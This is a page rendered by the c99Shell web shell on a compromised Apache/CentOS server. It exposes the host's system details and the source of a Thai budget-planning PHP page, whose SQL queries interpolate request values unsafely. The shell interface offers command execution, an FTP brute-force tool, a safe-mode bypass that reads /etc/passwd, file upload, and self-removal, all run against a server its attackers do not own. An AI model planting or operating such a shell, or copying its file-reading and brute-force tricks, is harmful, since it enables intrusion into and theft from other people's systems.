!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/Plan_new/   drwxr-xr-x
Free 52.66 GB of 127.8 GB (41.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     MissionFaculty.php (7.95 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
";
		echo "


กรุณาทำการ Login ก่อน

"; echo ""; exit(); } else { /** Configuration */ require_once( "../configuration.php" ); require_once( $_Config_absolute_path . "/includes/framework.php" ); require_once( "../include/Function.php" ); /** Chart */ include ("../includes/charts.php"); /** Create Database Object */ $dbObj = new DBConn; /** Config Table for This Page */ $myTable = "project_mission"; $myTablePK = "Budget_Year"; $myTable2 = "project_type_tb"; $myTable2PK = "ProjectId"; $myTable3 = "faculty_tb"; $myTable3PK = "Faculty_code"; //=== salary_repot_tb $query = " SELECT * FROM $myTable3 WHERE FacultyStatus='Y' "; $result = $dbObj->execQuery($query); $num = $dbObj->_numrows; $query = " SELECT * FROM $myTable WHERE Budget_Year='$Budget_Year' "; $result11 = $dbObj->execQuery($query); $rss = $dbObj->fetchArray($result11); $num = $dbObj->_numrows; /** Parameters */ $params = "Budget_Year=$Budget_Year"; } # else ?> ข้อมูลแผนดำเนินงานและรายงาน : ข้อมูลแผนดำเนินการ รายปีงบประมาณ
หน้าหลัก » ข้อมูลแผนปฎิบัติการตามพันธกิจ แสดงรายปี งปม execQuery($query3); $rs3 = $dbObj->fetchArray($result3); $dbObj->freeresult($result3); echo $rs3['Budget_Year']; ?>
‹ ย้อนกลับ
เลือกแสดงปีงบประมาณ
fetchArray($result) ) { $Faculty_code = $rs['Faculty_code']; $query3 = " SELECT * FROM project_plan WHERE Budget_Year='$Budget_Year' and Faculty_code='$Faculty_code' "; $result3 = $dbObj->execQuery($query3); $rss3 = $dbObj->fetchArray($result3); $countnum = $dbObj->_numrows ; $dbObj->freeresult($result3); $bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF"; ?>
หน่วยงาน จำนวนเงิน
ที่ขอใช้ตามแผน
execQuery($sql); $rs1 = $dbObj->fetchArray($result1); echo number_format($rs1['SumB1'],2,'.',','); ?>
    execQuery($sql3); $rss3 = $dbObj->fetchArray($result3); echo number_format($rss3['SumB1'],2,'.',','); ?>

 
freeresult($result); /** Close the Database */ $dbObj->disconn(); /** Unset Class */ unset($dbObj); ?>
bool(false)

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]--